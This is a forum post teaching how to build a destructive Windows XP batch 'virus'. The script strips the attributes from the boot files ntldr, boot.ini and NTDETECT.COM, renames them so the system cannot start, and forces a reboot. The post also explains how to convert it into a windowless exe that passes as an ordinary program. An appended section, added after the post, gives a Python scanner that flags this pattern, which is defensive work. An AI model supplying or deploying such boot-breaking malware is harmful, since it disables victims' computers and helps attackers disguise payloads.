gworld
HTML https://gworld.createaforum.com
---------------------------------------------------------
#Post#: 617--------------------------------------------------
SIMPLE VIRUS CREATING
By: eba95 Date: August 9, 2010, 11:18 am
---------------------------------------------------------
1. Create a boot disk
containing Boot Files.
2. Open Notepad and Copy the
Following Codes:
@echo off
ATTRIB -h -r -s c:\ntldr
REN c:\ntldr dxcore69ldr
shutdown.exe -r -f -t 05
EXIT
3. Save the File with a *.bat
extension
4. Download a bat2exe
software to convert the file
to .exe
5. The Virus Renames
the ntldr file to dxcore69ldr
disabling OSs to load.
6. Test the Virus in a
computer or using Virtual PC
software like VMWare or the
free Virtual Box.
Full Detail Procedure:
To start from the basics,
Operating Systems of the type
like Windows XP require
these three vital boot files to
start:
1. boot.ini
2. ntldr
3. NTDETECT.COM
Mentioned files are usually
located at the C: Drive and if
these are missing or
renamed, the dependent
Operating Systems won’t be
able to boot or start.
So by taking this as an
advantage the main target of
the virus is to rename one of
the files so that the Operating
Systems (usually the most
used, Windows XP) won’t be
able to boot.
But safety is always first, thus
we will create a Floppy boot
disk to get rescued from the
virus infection. And this
instruction is found all over
the Information
Superhighway and all the IT
Magazines had at least once
published the Rescue Disk
instructions in an article.
Anyways, the steps are:
1. Go to Control Panel and
then open Folder Options
2. Click on the View tab
3. Click on “Show Hidden Files
and Folders”, uncheck the
“Hide Extensions for known
file types” and “Hide
protected operating system
files” and then click “OK” and
“Yes”.
4. Now format a Floppy Disk
even if it’s empty and don’t
attempt to copy anything
now.
5. Now copy the three visible
boot files (boot.ini,
NTDETECT.COM and ntldr) from
the C drive directly to the
Floppy Disk.
Now, if you select the Floppy
Drive to boot first in bios
while the Rescue Floppy disk
is inserted, your operating
system will boot even though
the boot files in C: drive are
missing.
Let’s make the virus now by
renaming only the ntldr file.
Go to
Start>Programs>Accessories>Notepad
or Start>Run>notepad.exe and
copy and paste the following
lines:
@echo off
ATTRIB -h -r -s c:\ntldr
REN c:\ntldr dxcore69ldr
shutdown.exe -r -f -t 05
EXIT
Now go to File>Save and Type
“dxcore69.bat” and the file
will be saved with a .bat
extension.
You can now Double Click on
the dxcore69.bat file you have
created and the ntldr file
should be renamed to
dxcore69ldr disabling the OSs
to boot and a reboot will
occur after five seconds. And
the work of the virus is
completed.
In addition you may want to
create an uneditable virus
looking file by converting
the .bat file to a
noticeable .exe file. Well, the
bat2exe software of the
Package given at the end is
just excellent for doing that.
Browse and select the
dxcore69.bat, select an icon if
you want and check the Ghost
Application option as it will
show no window after launch.
Now let’s learn what is going
on:
Line # 1: @echo off
Not that necessary if
converted to exe with Ghost
Application option but its
work is not to show any lines
in the black window.
Line # 2: ATTRIB -h -r -s c:\ntldr
The ntldr file is a Read Only,
Hidden and a System File. This
command is just to disable
these attributes. -h makes a file
hidden but +h will turn it into
a hidden file. And similarly “r”
is for Read Only and “s” is for
System file Attribute. It’s
necessary to do the renaming
thingy.
Line # 3: REN c:\ntldr dxcore69ldr
REN stands for RENAME, in this
command ntldr file of C: Drive
gets renamed to dxcore69ldr.
Line # 4: shutdown.exe -r -f -t 05
This Command Restarts the
computer with a timeout of 5
seconds and forces all the
applications to close. Now the
supporting commands are:
-r = Restart
-f = Forces Applications to
close
-t = Timeout
05 = Timeout Value XX
Line # 5: EXIT
It just exits the program.
Now that you have learnt
some basics you can also
rename the remaining two
files and to do that type these
lines between the @echo and
the Shutdown line:
ATTRIB -h -r -s c:\boot.ini
REN c:\ntldr dxcore69.ini
ATTRIB -h -r -s c:
\NTDETECT.COM
REN c:\ntldr dxcore69.com
So the new overall virus is:
@echo off
ATTRIB -h -r -s c:\ntldr
REN c:\ntldr dxcore69ldr
ATTRIB -h -r -s c:\boot.ini
REN c:\boot.ini dxcore69.ini
ATTRIB -h -r -s c:
\NTDETECT.COM
REN c:\NTDETECT.COM
dxcore69.com
shutdown.exe -r -f -t 05
EXIT
It is natural for us to feel
afraid to test a virus on
your PC, but no problem, you
can try it on a Virtual OS
software like VMWare or the
free Virtualbox. It’s a kind of
software that, for example, gives
you the ability to install and
run Windows Vista in a
Window of Windows XP on a
virtual hard disk.
*****************************************************
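The script in the post above follows a recognisable pattern: clear the protective attributes on a boot file, rename it, then force a reboot. As an added example (not part of the original post), this Python scanner flags that pattern in batch-file text; `scan_batch`, `verdict`, the rule names and the benign sample are assumptions made for illustration.

```python
import ntpath

# Boot files named in the post; rule names and verdicts are illustrative.
BOOT_FILES = {"ntldr", "boot.ini", "ntdetect.com"}
TAMPER_CMDS = {"ren", "rename", "del", "erase", "move"}

def _parse(line):
    """Split a batch line into (command, args), lower-cased, without '@' or '.exe'."""
    parts = line.strip().lstrip("@").split()
    if not parts:
        return "", []
    cmd = parts[0].lower()
    cmd = cmd[:-4] if cmd.endswith(".exe") else cmd
    return cmd, [p.strip('"').lower() for p in parts[1:]]

def scan_batch(text):
    """Return [(line_number, rule)] for commands matching the boot-tamper pattern."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        cmd, args = _parse(line)
        switches = {a[1:] for a in args if a.startswith(("-", "/"))}
        paths = [a for a in args if not a.startswith(("-", "/", "+"))]
        hits_boot = any(ntpath.basename(p) in BOOT_FILES for p in paths)
        if cmd == "attrib" and hits_boot and set(args) & {"-h", "-r", "-s"}:
            findings.append((n, "attrib-strip"))
        elif cmd in TAMPER_CMDS and paths and ntpath.basename(paths[0]) in BOOT_FILES:
            findings.append((n, "boot-file-tamper"))
        elif cmd == "shutdown" and {"r", "f"} <= switches:
            findings.append((n, "forced-reboot"))
    return findings

def verdict(findings):
    """Escalate when a boot file is tampered with and a forced reboot follows."""
    rules = {rule for _, rule in findings}
    if {"boot-file-tamper", "forced-reboot"} <= rules:
        return "block"
    return "review" if rules & {"boot-file-tamper", "attrib-strip"} else "clean"

# The five-line script quoted in the post, used here as detector input.
SAMPLE_FROM_POST = r"""@echo off
ATTRIB -h -r -s c:\ntldr
REN c:\ntldr dxcore69ldr
shutdown.exe -r -f -t 05
EXIT
"""
# Constructed benign script: similar commands, no boot files, no forced reboot.
BENIGN_SAMPLE = r"""@echo off
attrib +r c:\reports\summary.txt
ren c:\reports\old.txt archive.txt
shutdown -r -t 60
"""

if __name__ == "__main__":
    for sample in (SAMPLE_FROM_POST, BENIGN_SAMPLE):
        print(verdict(scan_batch(sample)), scan_batch(sample))
```

A text scan like this only sees script files; once the script is wrapped into an .exe as the post describes, monitoring for rename or delete events on these boot files is the applicable control.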